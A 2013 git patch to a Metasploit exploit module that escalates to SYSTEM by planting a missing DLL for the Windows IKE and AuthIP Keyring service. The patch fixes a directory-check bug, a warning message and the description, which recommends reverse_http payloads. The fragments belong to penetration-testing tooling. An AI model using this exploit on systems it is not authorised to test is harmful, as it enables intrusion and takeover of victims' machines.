From 05426cb61bbbf87a8f5d0f7484a98d5b43a777e4 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sat, 27 Apr 2013 21:39:29 +0100 Subject: [PATCH] Fix dir creation --- modules/exploits/windows/local/ipsec_keyring_service.rb | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/ipsec_keyring_service.rb b/modules/exploits/windows/local/ipsec_keyring_service.rb index 912615d9f8..3635e079e7 100644 --- a/modules/exploits/windows/local/ipsec_keyring_service.rb +++ b/modules/exploits/windows/local/ipsec_keyring_service.rb @@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Local 'Description' => %q{ This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules' service which runs as SYSTEM, and starts automatically in default - installations of Vista-Win8. + installations of Vista-Win8. Use reverse_http(s) for greater reliability + when attempting to reboot system. }, 'References' => [ @@ -47,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Local ], 'SessionTypes' => [ "meterpreter" ], 'DefaultOptions' => - { + { 'EXITFUNC' => 'thread', 'WfsDelay' => '5' }, @@ -181,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Local @non_existant_dirs.each do |dir| begin client.fs.dir.mkdir(dir) - if exist?(path) + if exist?(dir) return dir end rescue Rex::Post::Meterpreter::RequestError => e @@ -226,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Local end if is_uac_enabled? - print_warning("UAC is enabled results, may get false negatives on writeable folders.") + print_warning("UAC is enabled, may get false negatives on writeable folders.") end if datastore['DIR'].empty?